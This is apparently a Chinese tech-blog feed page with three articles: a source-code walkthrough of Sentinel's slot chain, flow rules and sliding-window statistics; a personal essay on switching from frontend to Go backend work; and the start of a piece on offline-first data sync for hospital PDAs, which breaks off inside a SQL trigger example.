以下是 Sentinel 中各个 Slot 的默认执行顺序:

NodeSelectorSlot
    ↓
ClusterBuilderSlot
    ↓
StatisticSlot
    ↓
ParamFlowSlot
    ↓
SystemSlot
    ↓
AuthoritySlot
    ↓
FlowSlot
    ↓
DegradeSlot

NodeSelectorSlot - 上下文节点选择

这个功能插槽主要为资源下不同的上下文创建对应的 DefaultNode(实际用于统计指标信息)。解释一下Sentinel中的Node是什么,简单来说就是每个资源统计指标存放的容器,只不过内部由于不同的统计口径(秒级、分钟及)而分别有不同的统计窗口。Node在Sentinel不是单一的结构,而是总体上形成父子关系的树形结构。

不同的调用会有不同的 context 名称,如在当前 MVC 场景下,上下文为 sentinel_web_servlet_context。

public class NodeSelectorSlot extends AbstractLinkedProcessorSlot<Object> {

    /**
     * 同一个资源在不同上下文中的 DefaultNode 映射
     */
    private volatile Map<String, DefaultNode> map = new HashMap<String, DefaultNode>(10);

    @Override
    public void entry(Context context, ResourceWrapper resourceWrapper, Object obj, int count,
                      boolean prioritized, Object... args) throws Throwable {
        // 从映射表中获取当前上下文对应的节点
        DefaultNode node = map.get(context.getName());

        if (node == null) {
            // 双重检查锁,保证线程安全
            synchronized (this) {
                node = map.get(context.getName());
                if (node == null) {
                    // 创建新的 DefaultNode
                    node = new DefaultNode(resourceWrapper, null);

                    // 使用写时复制更新缓存
                    HashMap<String, DefaultNode> cacheMap = new HashMap<String, DefaultNode>(map.size());
                    cacheMap.putAll(map);
                    cacheMap.put(context.getName(), node);
                    map = cacheMap;

                    // 构建调用树
                    ((DefaultNode) context.getLastNode()).addChild(node);
                }
            }
        }

        // 设置当前上下文的当前节点
        context.setCurNode(node);
        // 继续执行后续 Slot
        fireEntry(context, resourceWrapper, node, count, prioritized, args);
    }

    @Override
    public void exit(Context context, ResourceWrapper resourceWrapper, int count, Object... args) {
        fireExit(context, resourceWrapper, count, args);
    }
}

ClusterBuilderSlot - 集群节点构建

这个功能槽主要用于创建 ClusterNode。ClusterNode 和 DefaultNode 的区别是:

DefaultNode 是特定于上下文的(context-specific);

ClusterNode 是不区分上下文的(context-independent),用于统计该资源在所有上下文中的整体数据。

public class ClusterBuilderSlot extends AbstractLinkedProcessorSlot<DefaultNode> {

    /**
     * 全局 ClusterNode 映射表
     */
    private static volatile Map<ResourceWrapper, ClusterNode> clusterNodeMap = new HashMap<>();

    private static final Object lock = new Object();

    private volatile ClusterNode clusterNode = null;

    @Override
    public void entry(Context context, ResourceWrapper resourceWrapper, DefaultNode node, int count,
                      boolean prioritized, Object... args) throws Throwable {
        // 创建 ClusterNode(如果不存在)
        if (clusterNode == null) {
            synchronized (lock) {
                if (clusterNode == null) {
                    // 创建集群节点
                    clusterNode = new ClusterNode(resourceWrapper.getName(), resourceWrapper.getResourceType());

                    // 更新全局映射表
                    HashMap<ResourceWrapper, ClusterNode> newMap =
                        new HashMap<>(Math.max(clusterNodeMap.size(), 16));
                    newMap.putAll(clusterNodeMap);
                    newMap.put(node.getId(), clusterNode);

                    clusterNodeMap = newMap;
                }
            }
        }

        // 将 ClusterNode 设置到 DefaultNode 中
        node.setClusterNode(clusterNode);

        // 如果有来源标识,则创建 origin node
        if (!"".equals(context.getOrigin())) {
            Node originNode = node.getClusterNode().getOrCreateOriginNode(context.getOrigin());
            context.getCurEntry().setOriginNode(originNode);
        }

        // 继续执行后续 Slot
        fireEntry(context, resourceWrapper, node, count, prioritized, args);
    }
}

StatisticSlot - 统计插槽

StatisticSlot 是 Sentinel 最重要的类之一,用于根据规则判断结果进行相应的统计操作。

统计逻辑说明

entry 的时候:

依次执行后续的判断 Slot;

每个 Slot 触发流控会抛出异常(BlockException 的子类);

若有 BlockException 抛出,则记录 block 数据;

若无异常抛出则算作可通过(pass),记录 pass 数据。

exit 的时候:

若无 error(无论是业务异常还是流控异常),记录 complete(success)以及 RT,线程数 -1。

记录数据的维度:

线程数 +1;

记录当前 DefaultNode 数据;

记录对应的 originNode 数据(若存在 origin);

累计 IN 统计数据(若流量类型为 IN)。

public class StatisticSlot extends AbstractLinkedProcessorSlot<DefaultNode> {

    @Override
    public void entry(Context context, ResourceWrapper resourceWrapper, DefaultNode node, int count,
                      boolean prioritized, Object... args) throws Throwable {
        try {
            // 此位置会调用 SlotChain 中后续的所有 Slot,完成所有规则检测
            fireEntry(context, resourceWrapper, node, count, prioritized, args);

            // 请求通过,增加线程数和通过数
            // 代码运行到这个位置,就证明之前的所有 Slot 检测都通过了
            // 此时就可以统计请求的相应数据了

            // 增加线程数(+1)
            node.increaseThreadNum();
            // 增加通过请求的数量(这里涉及到滑动窗口算法)
            node.addPassRequest(count);

            // 省略其他统计逻辑...

        } catch (PriorityWaitException ex) {
            // 如果是优先级等待异常,记录优先级等待数
            node.increaseThreadNum();
            if (context.getCurEntry().getOriginNode() != null) {
                context.getCurEntry().getOriginNode().increaseThreadNum();
            }
            if (resourceWrapper.getEntryType() == EntryType.IN) {
                // 记录入站统计数据
                Constants.ENTRY_NODE.increaseThreadNum();
            }
            throw ex;

        } catch (BlockException e) {
            // 如果被限流,记录被限流数
            // 省略 block 统计逻辑...
            throw e;

        } catch (Throwable ex) {
            // 如果发生业务异常,记录异常数
            // 省略异常统计逻辑...
            throw ex;
        }
    }

    @Override
    public void exit(Context context, ResourceWrapper resourceWrapper, int count, Object... args) {
        // 若无 error(无论是业务异常还是流控异常),记录 complete(success)以及 RT,线程数-1
        // 记录数据的维度:线程数+1、记录当前 DefaultNode 数据、记录对应的 originNode 数据(若存在 origin)
        // 、累计 IN 统计数据(若流量类型为 IN)
        // 省略 exit 统计逻辑...
    }
}

StatisticNode 数据结构

到这里,StatisticSlot 的作用已经比较清晰了。接下来我们需要分析它的统计数据结构。fireEntry 调用向下的节点和之前的方式一样,剩下的节点主要包括:

  • ParamFlowSlot;
  • SystemSlot;
  • AuthoritySlot;
  • FlowSlot;
  • DegradeSlot;

其中比较常见的是流控和熔断:FlowSlot、DegradeSlot,所以下面我们着重分析 FlowSlot。

六、FlowSlot - 流控插槽

这个 Slot 主要根据预设的资源的统计信息,按照固定的次序依次生效。如果一个资源对应两条或者多条流控规则,则会根据如下次序依次检验,直到全部通过或者有一个规则生效为止。

FlowSlot 核心逻辑

@SpiOrder(-2000)
public class FlowSlot extends AbstractLinkedProcessorSlot<DefaultNode> {

    @Override
    public void entry(Context context, ResourceWrapper resourceWrapper, DefaultNode node, int count,
                      boolean prioritized, Object... args) throws Throwable {
        // 执行流控检查
        checkFlow(resourceWrapper, context, node, count, prioritized);

        // 继续执行后续 Slot
        fireEntry(context, resourceWrapper, node, count, prioritized, args);
    }

    // 省略其他方法...
}

checkFlow 方法详解

/**
 * 执行流控检查
 *
 * @param ruleProvider 规则提供者函数
 * @param resource 资源包装器
 * @param context 上下文
 * @param node 节点
 * @param count 请求数量
 * @param prioritized 是否优先
 * @throws BlockException 如果被限流则抛出异常
 */
public void checkFlow(Function<String, Collection<FlowRule>> ruleProvider, ResourceWrapper resource,
                      Context context, DefaultNode node, int count, boolean prioritized) throws BlockException {
    // 判断规则和资源不能为空
    if (ruleProvider == null || resource == null) {
        return;
    }

    // 获取指定资源的所有流控规则
    Collection<FlowRule> rules = ruleProvider.apply(resource.getName());

    // 逐个应用流控规则。若无法通过则抛出异常,后续规则不再应用
    if (rules != null) {
        for (FlowRule rule : rules) {
            if (!canPassCheck(rule, context, node, count, prioritized)) {
                // FlowException 继承 BlockException
                throw new FlowException(rule.getLimitApp(), rule);
            }
        }
    }
}

通过这里我们就可以得知,流控规则是通过 FlowRule 来完成的,数据来源是我们使用的流控控制台,也可以通过代码进行设置。

FlowRule 流控规则

每条流控规则主要由三个要素构成:

  • grade(阈值类型):按 QPS(每秒请求数)还是线程数进行限流;
  • strategy(调用关系策略):基于调用关系的流控策略;
  • controlBehavior(流控效果):当 QPS 超过阈值时的流量整形行为。
public class FlowRule extends AbstractRule {

    public FlowRule() {
        super();
        // 来源默认 Default
        setLimitApp(RuleConstant.LIMIT_APP_DEFAULT);
    }

    public FlowRule(String resourceName) {
        super();
        // 资源名称
        setResource(resourceName);
        setLimitApp(RuleConstant.LIMIT_APP_DEFAULT);
    }

    /**
     * 流控的阈值类型
     * 0: 线程数
     * 1: QPS
     */
    private int grade = RuleConstant.FLOW_GRADE_QPS;

    /**
     * 流控阈值
     */
    private double count;

    /**
     * 基于调用链的流控策略
     * STRATEGY_DIRECT: 直接流控(按来源)
     * STRATEGY_RELATE: 关联流控(关联资源)
     * STRATEGY_CHAIN: 链路流控(按入口资源)
     */
    private int strategy = RuleConstant.STRATEGY_DIRECT;

    /**
     * 关联流控模式下的关联资源
     */
    private String refResource;

    /**
     * 流控效果(流量整形行为)
     * 0: 默认(直接拒绝)
     * 1: 预热(Warm Up)
     * 2: 排队等待(Rate Limiter)
     * 3: 预热 + 排队等待(目前控制台没有)
     */
    private int controlBehavior = RuleConstant.CONTROL_BEHAVIOR_DEFAULT;

    /**
     * 预热时长(秒)
     */
    private int warmUpPeriodSec = 10;

    /**
     * 排队等待的最大超时时间(毫秒)
     */
    private int maxQueueingTimeMs = 500;

    /**
     * 是否为集群模式
     */
    private boolean clusterMode;

    /**
     * 集群模式配置
     */
    private ClusterFlowConfig clusterConfig;

    /**
     * 流量整形控制器
     */
    private TrafficShapingController controller;

    // 省略 getter/setter 方法...
}

七、滑动窗口算法

不管流控规则采用何种流控算法,在底层都需要有支持指标统计的数据结构作为支撑。在 Sentinel 中,用于支撑基于 QPS 等限流的数据结构是 StatisticNode。

StatisticNode 数据结构

public class StatisticNode implements Node {

    /**
     * 保存最近 1 秒内的统计数据
     * 每个桶(bucket)500ms,共 2 个桶
     */
    private transient volatile Metric rollingCounterInSecond =
        new ArrayMetric(SampleCountProperty.SAMPLE_COUNT, IntervalProperty.INTERVAL);

    /**
     * 保存最近 60 秒的统计数据
     * windowLengthInMs 被特意设置为 1000 毫秒,即每个桶代表 1 秒
     * 共 60 个桶,这样可以获得每秒精确的统计信息
     */
    private transient Metric rollingCounterInMinute =
        new ArrayMetric(60, 60 * 1000, false);

    // 省略其他字段和方法...
}

ArrayMetric 核心实现

ArrayMetric 是 Sentinel 中数据采集的核心,内部使用了 BucketLeapArray,即滑动窗口的思想进行数据的采集。

public class ArrayMetric implements Metric {

    /**
     * 滑动窗口数组
     */
    private final LeapArray<MetricBucket> data;

    public ArrayMetric(int sampleCount, int intervalInMs) {
        this.data = new OccupiableBucketLeapArray(sampleCount, intervalInMs);
    }

    public ArrayMetric(int sampleCount, int intervalInMs, boolean enableOccupy) {
        if (enableOccupy) {
            // 可抢占的滑动窗口,支持借用未来窗口的配额
            this.data = new OccupiableBucketLeapArray(sampleCount, intervalInMs);
        } else {
            // 普通滑动窗口
            this.data = new BucketLeapArray(sampleCount, intervalInMs);
        }
    }
}

这里有两种实现:

  • BucketLeapArray:普通滑动窗口,每个时间桶仅记录固定时间窗口内的指标数据;
  • OccupiableBucketLeapArray:扩展实现,支持"抢占"未来时间窗口的令牌或容量,在流量突发时允许借用后续窗口的配额,实现更平滑的限流效果。

BucketLeapArray - 滑动窗口实现

LeapArray 核心属性

LeapArray 是滑动窗口的基础类,其核心属性如下:

/**
 * 窗口大小(长度),单位:毫秒
 * 例如:1000ms
 */
private int windowLengthInMs;

/**
 * 样本数(桶的数量)
 * 例如:5(表示 5 个桶,每个 1000ms,总共 5 秒)
 */
private int sampleCount;

/**
 * 采集周期(总时间窗口长度),单位:毫秒
 * 例如:5 * 1000ms(5 秒)
 */
private int intervalInMs;

/**
 * 窗口数组,array 长度就是样本数 sampleCount
 */
protected final AtomicReferenceArray<WindowWrap<T>> array;

/**
 * 更新窗口数据的锁,保证数据的正确性
 */
private final ReentrantLock updateLock;

WindowWrap 窗口包装器

每个窗口包装器包含三个属性:

 public class WindowWrap<T> {

    /**
     * 窗口大小(长度),单位:毫秒
     * 与 LeapArray 中的 windowLengthInMs 一致
     */
    private final long windowLengthInMs;

    /**
     * 窗口开始时间戳
     * 它的值是 windowLengthInMs 的整数倍
     */
    private long windowStart;

    /**
     * 窗口数据(泛型 T)
     * Sentinel 目前只有 MetricBucket 类型,存储统计数据
     */
    private T value;
}

MetricBucket 指标桶

public class MetricBucket {

    /**
     * 计数器数组
     * 长度是需要统计的事件种类数,目前是 6 个
     * LongAdder 是线程安全的计数器,性能优于 AtomicLong
     */
    private final LongAdder[] counters;
    
    // 省略其他字段和方法...
}

滑动窗口工作原理

LeapArray 统计数据的基本思路:

创建一个长度为 n 的数组,数组元素就是窗口;

每个窗口包装了 1 个指标桶,桶中存放了该窗口时间范围内对应的请求统计数据;

可以想象成一个环形数组在时间轴上向右滚动;

请求到达时,会命中数组中的一个窗口,该请求的数据就会存到命中的这个窗口包含的指标桶中;

当数组转满一圈时,会回到数组的开头;

此时下标为 0 的元素需要重复使用,它里面的窗口数据过期了,需要重置,然后再使用。

获取当前窗口

LeapArray 获取当前时间窗口的方法:

 /**
 * 获取当前时间戳对应的窗口
 *
 * @return 当前时间的窗口
 */
public WindowWrap<T> currentWindow() {
    return currentWindow(TimeUtil.currentTimeMillis());
}

/**
 * 获取指定时间戳对应的窗口(核心方法)
 *
 * @param timeMillis 时间戳(毫秒)
 * @return 对应的窗口
 */
public WindowWrap<T> currentWindow(long timeMillis) {
    if (timeMillis < 0) {
        return null;
    }

    // 计算数组下标
    int idx = calculateTimeIdx(timeMillis);

    // 计算当前请求对应的窗口开始时间
    long windowStart = calculateWindowStart(timeMillis);

    // 无限循环,确保能够获取到窗口
    while (true) {
        // 取窗口
        WindowWrap<T> old = array.get(idx);

        if (old == null) {
            // 第一次使用,创建新窗口
            WindowWrap<T> window = new WindowWrap<T>(windowLengthInMs, windowStart, newEmptyBucket(timeMillis));

            // CAS 操作,确保只初始化一次
            if (array.compareAndSet(idx, null, window)) {
                // 成功更新,返回创建的窗口
                return window;
            } else {
                // CAS 失败,让出时间片,等待其他线程完成初始化
                Thread.yield();
            }

        } else if (windowStart == old.windowStart()) {
            // 命中:取出的窗口的开始时间和本次请求计算出的窗口开始时间一致
            return old;

        } else if (windowStart > old.windowStart()) {
            // 窗口过期:本次请求计算出的窗口开始时间大于取出的窗口
            // 说明取出的窗口过期了,需要重置
            if (updateLock.tryLock()) {
                try {
                    // 成功获取锁,更新窗口开始时间,计数器重置
                    return resetWindowTo(old, windowStart);
                } finally {
                    updateLock.unlock();
                }
            } else {
                // 获取锁失败,让出时间片,等待其他线程更新
                Thread.yield();
            }

        } else if (windowStart < old.windowStart()) {
            // 异常情况:机器时钟回拨等
            // 正常情况不会进入该分支
            return new WindowWrap<T>(windowLengthInMs, windowStart, newEmptyBucket(timeMillis));
        }
    }
}

数据存储

在获取到窗口之后,就可以存储数据了。ArrayMetric 实现了 Metric 中存取数据的接口方法。

示例:存储 RT(响应时间)

/**
 * 添加响应时间数据
 *
 * @param rt 响应时间(毫秒)
 */
public void addRT(long rt) {
    // 获取当前时间窗口,data 为 BucketLeapArray
    WindowWrap<MetricBucket> wrap = data.currentWindow();

    // 计数
    wrap.value().addRT(rt);
}

/**
 * MetricBucket 的 addRT 方法
 *
 * @param rt 响应时间
 */
public void addRT(long rt) {
    // 记录 RT 时间对 rt 值
    add(MetricEvent.RT, rt);

    // 记录最小响应时间(非线程安全,但没关系)
    if (rt < minRt) {
        minRt = rt;
    }
}

/**
 * 通用的计数方法
 *
 * @param event 事件类型
 * @param n 增加的数量
 * @return 当前桶
 */
public MetricBucket add(MetricEvent event, long n) {
    counters[event.ordinal()].add(n);
    return this;
}

数据读取

示例:读取 RT(响应时间)

/**
 * 获取总响应时间
 *
 * @return 总响应时间
 */
public long rt() {
    // 触发当前窗口更新(处理过期窗口)
    data.currentWindow();

    long rt = 0;
    // 取出所有的 bucket
    List<MetricBucket> list = data.values();

    for (MetricBucket window : list) {
        rt += window.rt(); // 求和
    }
    return rt;
}

/**
 * 获取所有有效的窗口
 *
 * @return 有效窗口列表
 */
public List<T> values() {
    return values(TimeUtil.currentTimeMillis());
}

/**
 * 获取指定时间之前的所有有效窗口
 *
 * @param timeMillis 时间戳
 * @return 有效窗口列表
 */
public List<T> values(long timeMillis) {
    if (timeMillis < 0) {
        return new ArrayList<T>(); // 正常情况不会到这里
    }

    int size = array.length();
    List<T> result = new ArrayList<T>(size);

    for (int i = 0; i < size; i++) {
        WindowWrap<T> windowWrap = array.get(i);

        // 过滤掉没有初始化过的窗口和过期的窗口
        if (windowWrap == null || isWindowDeprecated(timeMillis, windowWrap)) {
            continue;
        }

        result.add(windowWrap.value());
    }
    return result;
}

/**
 * 判断窗口是否过期
 *
 * @param time 给定时间(通常是当前时间)
 * @param windowWrap 窗口包装器
 * @return 如果过期返回 true
 */
public boolean isWindowDeprecated(long time, WindowWrap<T> windowWrap) {
    // 给定时间与窗口开始时间超过了一个采集周期
    return time - windowWrap.windowStart() > intervalInMs;
}

OccupiableBucketLeapArray - 可抢占窗口

为什么需要 OccupiableBucketLeapArray?

假设一个资源的访问 QPS 稳定是 10,请求是均匀分布的:

在时间 0.0-1.0 秒区间中,通过了 10 个请求;

在 1.1 秒的时候,观察到的 QPS 可能只有 5,因为此时第一个时间窗口被重置了,只有第二个时间窗口有值;

当在秒级统计的情形下,用 BucketLeapArray 会有 0~50%的数据误这时就要用 OccupiableBucketLeapArray 来解决这个问题。

OccupiableBucketLeapArray 实现

从上面我们可以看到在秒级统计 rollingCounterInSecond 中,初始化实例时有两种构造参数:

public class OccupiableBucketLeapArray extends LeapArray<MetricBucket> {

    /**
     * 借用未来窗口的数组
     */
    private final FutureBucketLeapArray borrowArray;

    public OccupiableBucketLeapArray(int sampleCount, int intervalInMs) {
        super(sampleCount, intervalInMs);
        // 创建借用窗口数组
        this.borrowArray = new FutureBucketLeapArray(sampleCount, intervalInMs);
    }

    /**
     * 创建新的空桶
     * 会从 borrowArray 中借用数据
     */
    @Override
    public MetricBucket newEmptyBucket(long time) {
        MetricBucket newBucket = new MetricBucket();

        // 获取借用窗口的数据
        MetricBucket borrowBucket = borrowArray.getWindowValue(time);
        if (borrowBucket != null) {
            // 将借用数据复制到新桶中
            newBucket.reset(borrowBucket);
        }

        return newBucket;
    }

    /**
     * 重置窗口
     * 会从 borrowArray 中借用 pass 数据
     */
    @Override
    protected WindowWrap<MetricBucket> resetWindowTo(WindowWrap<MetricBucket> w, long time) {
        // 更新开始时间并重置值
        w.resetTo(time);

        MetricBucket borrowBucket = borrowArray.getWindowValue(time);
        if (borrowBucket != null) {
            // 重置桶值并添加借用的 pass 数据
            w.value().reset();
            w.value().addPass((int) borrowBucket.pass());
        } else {
            w.value().reset();
        }

        return w;
    }

    /**
     * 获取当前等待中的请求数量
     */
    @Override
    public long currentWaiting() {
        borrowArray.currentWindow();
        long currentWaiting = 0;
        List<MetricBucket> list = borrowArray.values();

        for (MetricBucket window : list) {
            currentWaiting += window.pass();
        }
        return currentWaiting;
    }

    /**
     * 添加等待中的请求数量
     *
     * @param time 时间
     * @param acquireCount 获取数量
     */
    @Override
    public void addWaiting(long time, int acquireCount) {
        WindowWrap<MetricBucket> window = borrowArray.currentWindow(time);
        window.value().add(MetricEvent.PASS, acquireCount);
    }
}

八、总结

至此,Sentinel 的基本情况都已经分析完成。以上内容主要讲解了 Sentinel 的核心处理流程,包括:

核心流程总结

  1. 规则加载:
  • 通过 RuleLoader 将各种规则(流控、熔断、系统限流等)加载到内存缓存中。
  1. 请求拦截:
  • 通过 SentinelServletFilter 过滤器拦截 HTTP 请求;
  • 通过SentinelResourceAspect切面处理 @SentinelResource 注解。
  1. 责任链处理:
  • 使用 ProcessorSlotChain 责任链模式组合多个功能插槽;
  • 每个插槽负责特定的功能(统计、流控、熔断等)。
  1. 流控判断:
  • FlowSlot 根据流控规则判断是否限流;
  • 通过滑动窗口算法统计 QPS、线程数等指标。
  1. 异常处理:
  • 被限流时抛出 BlockException;
  • 通过 blockHandler 或 fallback 处理异常。

核心技术点

  1. 责任链模式:
  • 通过 ProcessorSlotChain 将不同的限流功能组合在一起。
  1. 滑动窗口算法:
  • LeapArray 实现环形滑动窗口;
  • BucketLeapArray 普通滑动窗口;
  • OccupiableBucketLeapArray 可抢占窗口,支持借用未来配额。
  1. 数据结构:
  • DefaultNode:特定于上下文的统计节点;
  • ClusterNode:不区分上下文的集群统计节点;
  • StatisticNode:核心统计节点,包含秒级和分钟级统计。
  1. 限流算法:
  • QPS 限流:通过滑动窗口统计 QPS;
  • 线程数限流:通过原子计数器统计线程数;
  • 流控效果:快速失败、预热、排队等待等;

Sentinel 通过精心设计的架构,实现了高效、灵活、可扩展的流量控制能力,为微服务系统提供了强大的保护机制。

往期回顾

1.社区推荐重排技术:双阶段框架的实践与演进|得物技术

2.Flink ClickHouse Sink:生产级高可用写入方案|得物技术

3.服务拆分之旅:测试过程全揭秘|得物技术

4.大模型网关:大模型时代的智能交通枢纽|得物技术

5.从“人治”到“机治”:得物离线数仓发布流水线质量门禁实践

文 /万钧

关注得物技术,每周更新技术干货

要是觉得文章对你有帮助的话,欢迎评论转发点赞~

未经得物技术许可严禁转载,否则依法追究法律责任。

昨天 — 2026年2月25日首页

过程即奖励|前端转后端经验分享

作者 禾味
2026年2月25日 16:43

转岗动机

先简单介绍一下我的背景:通信专业,秋招前自学前端,21 年 7 月校招进入某教育公司做前端开发。刚毕业就赶上行业寒冬,那会儿“双减”政策落地,教育行业整体受挫,我们组的业务也大受影响,年底我就有了准备跳槽的念头。

22 年 5 月,我加入字节,做了两年的前端开发。24 年 3 月,我们团队有一轮调整,当时前端人力有点冗余,后端则比较稀缺。当时的 +1 找我聊,问我愿不愿意试试转岗做后端。我没有纠结太久,原因很简单:换一个岗位,相当于多了一种视角,我会接触到完全不一样的一套知识体系,就算未来不继续做后端,了解后端体系对前端工作也是加分项。

所以当时的我抱着非常明确的“学习型心态”,接受了 +1 的提议。

转岗阵痛期

和 +1 沟通确认之后,我就开始正式接触团队的后端项目了。团队统一用 Go,所以技术栈没什么选择余地。

我的入门路线是:

第一步:搞定环境配置。安装 Go 环境、配置 IDE;快速过一遍 Go 基础语法;把项目跑起来,能在本地看到服务正常启动。得益于公司完善的文档体系,这一步没什么太大难度。

第二步:熟悉项目代码。从入口开始顺藤摸瓜,找逻辑简单的接口,看一看处理链路。

第三步:开始上手需求,在干中学。我写的第一个后端功能是数据导出,在那个需求里,我一边写一边学到了 Go 协程的用法、操作系统和内存管理以及 MongoDB 的数据存储和处理。

为了不让自己“只停留在能写”的状态,周末我会给自己留一点“作业”:研究项目里用到的框架是怎么组织代码的;熟悉各种数据库的常见用法,学习该怎么选型;内网搜罗各种“后端扫盲手册”,一点点补课。大概一个月之后,回头看自己写的第一个功能,我已经能发现问题并且知道怎么去优化了。那一刻还蛮有成就感的:我在进步。

但没高兴几天,真正的考验来了。

24 年 5 月,带我 landing 的后端同事转岗走了。在只学了个大概、刚能磕磕绊绊写需求的情况下,我被迫成了那个模块的“后端负责人”。这意味着我需要自己去拆解需求、写方案,自己接 oncall、处理用户问题,还要扛线上问题。

那段时间是我转岗后最痛苦的时期:我还不太会处理线上数据,怕操作失误没法回滚,遇到问题的第一反应甚至是“打不过就跑”。但人在压力下的成长往往是加速的,我比我想象的要更抗压更坚韧。周末打黑工 review 技术方案,处理用户问题到凌晨 —— 就这样硬着头皮扛了两三个月,直到组里招到了新的资深后端,我才松了口气。

那一阵过去之后,我拿到了那个季度的 spot bonus,+1 也非常肯定那段时间我的撑场表现。那一刻的心态变化很微妙:原本我以为自己不行的事情,其实也能撑下来;后端这条路,好像还可以再走远一点。

渐入佳境

24 年下半年(7月 - 12月),我持续做后端需求,同时有计划地补课:从数据存储、服务搭建,到中间件的使用,再到操作系统、并发控制、公司各种基建。

如果按季度拆解,大概是这样一个过程:Q3 能 cover 日常需求,线上有报警能第一时间看日志、查监控定位问题;遇到复杂问题不再“完全没头绪”。Q4 可以独立负责一些模块, 能从 0 到 1 设计技术方案;开始考虑性能和扩展性,而不仅仅是“先实现再说”。

回头看 24 年,我的收获远远超出了我的预期:我不仅完成了从前端到后端的角色转换,更重要的是,我开始有能力独立负责一个模块从设计到上线的全流程。到了 25 年,工作状态逐渐变得“得心应手”:独立完成项目,主动做性能优化,日常工作能从容应对。

回看这段转岗之路,也是我慢慢读懂并实践毛选智慧的过程。《实践论》教会我“干中学”,边干边学习,边学习边完善,循环往复,螺旋上升;《矛盾论》教会我“抓重点”,找准当前阶段最关键的问题,集中精力解决它,其他的也会随之理顺。

经验总结

如果只用一句话来总结我的体会,那就是:后端不用关注那么琐碎的交互和 UI,真好。当然这是半开玩笑,但也是真实的感受。

做前端时,习惯看交互反馈、动画细节、兼容性,各种像素级的“抠”。做后端之后,关注点转移到了业务逻辑、数据存储、服务稳定性。后端的世界有一种“更纯粹”的感觉。但这并不是说前端不重要 —— 前端承载了用户最直观的体验和感受,后端更像是系统的“地基和管道”,问题不显眼,但影响很大。

回头再看这段经历,我想说:转岗是一条没那么难的路,只要你会写代码,你就可以转岗。甚至在这个 Vibe coding 的时代,会不会写代码都已经不是最重要的事了。

重要的是,你是否愿意从头开始学习一套新体系、接受短期内变回“新人”的落差感、在一段时间里承受不确定性和压力。

对我自己来说,支撑我走过这段路的几个关键词是:

  • 学习心态:把转岗当作一次进阶,不是“被动调岗”,而是“主动拓展边界”;

  • 不畏难:遇到不懂的东西,不急着给自己贴“我不行”的标签,而是拆解问题一个个啃;

  • 不给自己设限:有些事没做过,不代表做不了,试试又不会怎么样。

我的飞书签名一直是乔布斯的那句格言:过程即奖励。在这段经历里,我发现自己比想象中更能抗压,那些硬着头皮撑下来的日子,回过头看,恰恰是成长最快的时候。曾国藩说“吾生平长进,全在受挫受辱之时” —— 大概就是这个意思。

总而言之,如果你也有过类似的念头 —— 想换个方向,想看一看系统的另一面,或者单纯想跳出舒适区,那我真诚地献上一句来自“过来人”的鼓励:

你可以的。

只要你愿意试,愿意学,你肯定会有所收获。

以上,希望对你有点帮助:)

昨天以前首页

彻底讲透医院移动端手持设备PDA离线同步架构:从"记账本"到"分布式共识",吊打面试官

2026年2月24日 17:12

一套解决"手术室铅门屏蔽导致WiFi掉线"的工业级方案,如何从生活常识进化成分布式系统理论?


第一层:幼儿园版 —— 为什么要有这个算法?

想象一下,你是一个在手术室工作的护士。

场景还原

  • 你拿着一个PDA(像一个大手机)给病人做登记
  • 手术室的铅门像一个大铁盖子,WiFi信号根本穿不进来
  • 电梯里、地下室、病区走廊,网络时有时无

问题来了
如果你每次点“保存”都要等网络响应,那在信号差的地方,APP就会一直转圈圈,甚至闪退。病人等着做手术,你却在和机器怄气。

最朴素的想法
能不能不管有没有网,我先记下来?等有网的时候,手机自己悄悄传上去,别让我操心。

这就是算法的原点本地优先(Offline-First) ——网络只是用来同步的工具,不是工作的前提。


第二层:小学生版 —— 用“草稿本”和“作业本”理解

我们把整个过程简化成小学生写作业的场景。

传统模式(在线模式)

  • 老师(服务器)说:“写作业必须在我眼皮底下写”
  • 你(客户端)只能对着老师写,老师一转身(断网),你就写不了
  • 这就是“在线API”的困境

本地优先模式

第一步:准备草稿本(本地数据库)
你随身带一个草稿本(手机里的SQLite数据库)。不管老师在不在,你先在草稿本上写。

第二步:给作业打标签
你在每道题旁边画个小标记:

  • 已写完(已保存到本地)
  • 老师还没看(待同步)
  • 这是修改过的(操作类型)

第三步:抄作业机制(同步逻辑)
网络好了,你开始往老师的正式作业本上抄:

  • 先抄新写的(增量同步)
  • 抄到一半断网了,记住抄到哪了(断点续传)
  • 下次联网接着抄

第四步:两人同时改作业怎么办(冲突解决)
如果两个同学同时改了同一道题:

  • 简单处理:谁最后改的听谁的(时间戳优先)
  • 高级处理:A改了第一问,B改了第二问,合并起来(字段级合并)

核心口诀先写草稿,有空再抄,抄不完的记位置,打架了看情况合并。


第三层:初中生版 —— 数据结构的雏形

现在我们要把草稿本设计得更科学一些。

3.1 普通笔记本的局限

如果只是简单存数据,会碰到几个问题:

  1. 我怎么知道哪些数据已经同步过了?
  2. 数据被改了好几次,只记最后的结果够吗?
  3. 每次同步要把整个本子都给老师看吗?太费劲了。

3.2 给数据加“贴纸”

我们在数据库的每一行数据后面,贴上几个隐藏标签:

字段名 含义 取值
sync_status 同步状态 0-未同步,1-同步中,2-已同步
op_type 操作类型 INSERT/UPDATE/DELETE
version 版本号 时间戳或自增数字

这样设计的好处

  • 一眼就能看出哪些数据还没上传
  • 知道这条数据是新增的、修改的还是删除的
  • 版本号可以用来比对谁更新

3.3 增量同步的雏形

不用每次都把所有数据传给服务器。客户端记住自己最后一次同步的版本号(last_sync_version),下次只问服务器:

“上次同步到版本100了,你这有版本101之后的新数据吗?”

这就是增量步进机制的雏形。


第四层:高中生版 —— 引入“流水账”思维

到了高中,我们要解决一个更复杂的问题:操作日志(Op-Log)

4.1 只记结果的问题

假设你修改了一条数据3次:

  1. 体温36.5 → 37.0
  2. 体温37.0 → 37.5
  3. 体温37.5 → 36.8

如果只存最后的结果(36.8),服务器永远不知道中间发生了什么。这在某些场景下是不行的(比如医疗审计需要完整轨迹)。

4.2 引入“流水账”

我们不再只关心数据长什么样,而是关心数据是怎么变的。

新建一个操作日志表,记录:

时间 操作人 对象 字段 旧值 新值
10:01 护士A 患者X 体温 36.5 37.0
10:05 护士A 患者X 体温 37.0 37.5
10:10 护士B 患者X 血压 120 130

这个设计的神奇之处

  • 网络断了也不怕,流水账存在本地
  • 恢复联网后,按顺序重放(Replay)这些操作
  • 即使服务器数据乱了,也能通过重放恢复到正确状态
  • 可以追溯每一个操作的源头

4.3 触发器自动记账

手动记录太麻烦。我们让数据库自己记:

-- 创建触发器:当体温表被修改时,自动往日志表插一条记录
CREATE TRIGGER log_temperature_changes
AFTER UPDATE ON patient_vitals
FOR EACH ROW
BEGIN
